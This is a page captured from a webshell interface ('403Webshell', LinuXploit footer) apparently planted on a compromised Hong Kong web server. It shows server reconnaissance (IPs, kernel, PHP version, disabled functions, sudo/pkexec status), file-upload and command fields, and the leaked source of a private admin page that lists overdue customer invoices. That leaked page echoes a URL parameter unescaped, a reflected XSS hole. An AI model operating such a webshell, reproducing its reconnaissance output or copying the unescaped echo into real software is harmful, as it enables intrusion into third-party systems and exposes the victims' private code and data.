403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/innoutstorage/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/innoutstorage/webadmin/duedate_alert.php
<?php
require_once('check_login.php');

$duedate_alert_info = array();
$i = 0;

//$duedate_alert = 0;
//$duedate_alert = -21;

/*$date = new DateTime();
$date->modify('-'.$duedate_alert.' day');*/

$sql = "select * from deposit where balance != ? and status != ? and ? > duedate and deleted = ?";
$parameters = array(0, "PAID", date("Y-m-d"), 0);
$deposit_info = bind_pdo($sql, $parameters, "selectall");

foreach($deposit_info as $deposit){
    $order_info = get_order($deposit["order_id"]);
    $duedate_alert_info[$i]["order_id"] = $order_info["id"];
    $customer_info = get_customer($order_info["customer_id"]);
    $duedate_alert_info[$i]["customer_id"] = $customer_info["id"];
    $duedate_alert_info[$i]["customer_code"] = $customer_info["code"];
    $duedate_alert_info[$i]["customer_name"] = $customer_info["customer_name"];

    $type_info = get_master_type_code("PAYMENT_TYPE", "DEPOSIT");
    $duedate_alert_info[$i]["type"] = $type_info["name_tc"];
    $duedate_alert_info[$i]["type_code"] = "DEPOSIT";
    $duedate_alert_info[$i]["code"] = $deposit["code"];
    $duedate_alert_info[$i]["id"] = $deposit["id"];
    $duedate_alert_info[$i]["amount"] = $deposit["amount"];
    $duedate_alert_info[$i]["balance"] = $deposit["balance"];
    $duedate_alert_info[$i]["duedate"] = $deposit["duedate"];

    $start_date = new DateTime($deposit["duedate"]);
    $since_start = $start_date->diff(new DateTime(date("Y-m-d")));
    $duedate_alert_info[$i]["overdue"] = $since_start->days;

    $i++;
}

$sql = "select * from invoice where balance != ? and status != ? and ? > duedate and deleted = ?";
$parameters = array(0, "SETTLED", date("Y-m-d"), 0);
$invoice_info = bind_pdo($sql, $parameters, "selectall");

foreach($invoice_info as $invoice){
    if(!empty($invoice["order_id"])){
        $order_info = get_order($invoice["order_id"]);
        $duedate_alert_info[$i]["order_id"] = $order_info["id"];
        $customer_info = get_customer($order_info["customer_id"]);
        $duedate_alert_info[$i]["customer_id"] = $customer_info["id"];
        $duedate_alert_info[$i]["customer_code"] = $customer_info["code"];
        $duedate_alert_info[$i]["customer_name"] = $customer_info["customer_name"];
    }else{

        $duedate_alert_info[$i]["order_id"] = 0;
        $customer_info = get_customer($invoice["customer_id"]);
        $duedate_alert_info[$i]["customer_id"] = $customer_info["id"];
        $duedate_alert_info[$i]["customer_code"] = $customer_info["code"];
        $duedate_alert_info[$i]["customer_name"] = $customer_info["customer_name"];

    }


    $type_info = get_master_type_code("PAYMENT_TYPE", "INVOICE");
    $duedate_alert_info[$i]["type"] = $type_info["name_tc"];
    $duedate_alert_info[$i]["type_code"] = "INVOICE";
    $duedate_alert_info[$i]["code"] = $invoice["code"];
    $duedate_alert_info[$i]["id"] = $invoice["id"];
    $duedate_alert_info[$i]["amount"] = $invoice["amount"];
    $duedate_alert_info[$i]["balance"] = $invoice["balance"];
    $duedate_alert_info[$i]["duedate"] = $invoice["duedate"];

    $start_date = new DateTime($invoice["duedate"]);
    $since_start = $start_date->diff(new DateTime(date("Y-m-d")));
    $duedate_alert_info[$i]["overdue"] = $since_start->days;
    $i++;
}
?>
<!DOCTYPE html>
<html>
<head>
    <?php require_once("html_head.php"); ?>

    <script type="text/javascript">
        function duedate_email(order_id, type_code, invoice_id){
            alert("電郵發送中,請稍候。");

            var xmlhttp;

            if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari
                xmlhttp = new XMLHttpRequest();
            }
            else {// code for IE6, IE5
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
            }
            xmlhttp.onreadystatechange = function () {
                if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
                    var result = $.trim(xmlhttp.responseText);

                    //console.log(result);
                    if(parseInt(result) == 1){
                        alert("電郵已成功送出。");
                    }else{
                        alert(result+"電郵未能成功送出。");
                    }
                }
            }
            xmlhttp.open("POST", "_ajax.php?for=overdue_email", true);
            xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            xmlhttp.send("order_id=" + (order_id) + "&type_code=" + type_code + "&invoice_id=" + invoice_id);
        }
    </script>
</head>

<body>
<table width="1000" height="600" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="200" align="left" valign="top">
            <table width="200" border="0" cellpadding="0" cellspacing="0">
                <tr>
                    <td height="70" align="left" valign="middle">&nbsp;</td>
                </tr>
                <tr>
                    <td width="200" align="left" valign="top"><!-- Main Menu -->
                        <?php require("menu.php"); ?><!-- End Main Menu --></td>
                </tr>
            </table>
        </td>
        <td width="800" align="left" valign="top">
            <table width="800" border="0" cellpadding="0" cellspacing="0">
                <tr>
                    <td>
                        <table width="800" border="0" cellspacing="0" cellpadding="0">
                            <tr>
                                <td height="70" class="pagetitletxt">&nbsp;&nbsp;</td>
                                <td width="50" align="center" class="icontxt">

                                </td>
                            </tr>
                        </table>
                    </td>
                </tr>
                <tr>
                    <td class="pagetitletxt">
                        &nbsp;&nbsp;<b><img src="images/iconList.jpg" width="48" height="48" align="absmiddle"/>

                            逾期欠款

                        </b></td>
                </tr>
                <tr>
                    <td height="25" align="left" valign="middle" class="msg"><?php if (isset($_GET["msg"])) echo $_GET['msg']; ?></td>
                </tr>

                <tr>
                    <td align="left" valign="middle">

                        <table width="1000" border="0" cellpadding="0" cellspacing="0">
                            <tr>
                                <td width="10" class="listtitletxt"></td>
                                <td width="130" class="listtitletxt">客戶姓名</td>
                                <td width="100" class="listtitletxt">客戶編號</td>
                                <td width="100" class="listtitletxt">發票類型</td>
                                <td width="130" class="listtitletxt">發票編號</td>
                                <td width="100" class="listtitletxt">金額</td>
                                <td width="100" class="listtitletxt">未付金額</td>
                                <td width="80" class="listtitletxt">繳費日期</td>
                                <td width="50" class="listtitletxt">已逾期</td>
                                <td width="80" class="listtitletxt"></td>
                            </tr>

                            <?php
                            foreach($duedate_alert_info as $detail){
                                print "<tr>";
                                print "<td class='listtxt' style='padding-left:5'>&nbsp;</td>";
                                print "<td class='listtxt' style='padding-left:5'>" . $detail{'customer_name'} . "</td>";
                                print "<td class='listtxt' style='padding-left:5'>" . $detail{'customer_code'} . "</td>";
                                print "<td class='listtxt' style='padding-left:5'>" . $detail["type"] . "</td>";
                                print "<td class='listtxt' style='padding-left:5'>" . $detail["code"] . "</td>";
                                print "<td class='listtxt' style='padding-left:5'>" . numberformat($detail["amount"]) . "</td>";
                                print "<td class='listtxt' style='padding-left:5'>" . numberformat($detail["balance"]) . "</td>";
                                print "<td class='listtxt' style='padding-left:5'>" . $detail["duedate"] . "</td>";
                                print "<td class='listtxt' style='padding-left:5'>" . $detail["overdue"] . "日</td>";
                                print "<td class='listtxt' style='padding-left:5'><button type='button' onclick='duedate_email(".$detail["order_id"].",\"".$detail["type_code"]. "\",".$detail["id"].")'>發送電郵</button> </td>";

                                print "</tr>";

                                print "</tr>";

                            }

                            ?>
                        </table>
                    </td>
                </tr>
            </table>
        </td>
    </tr>
</table>
</body>
</html>



Youez - 2016 - github.com/yon3zu
LinuXploit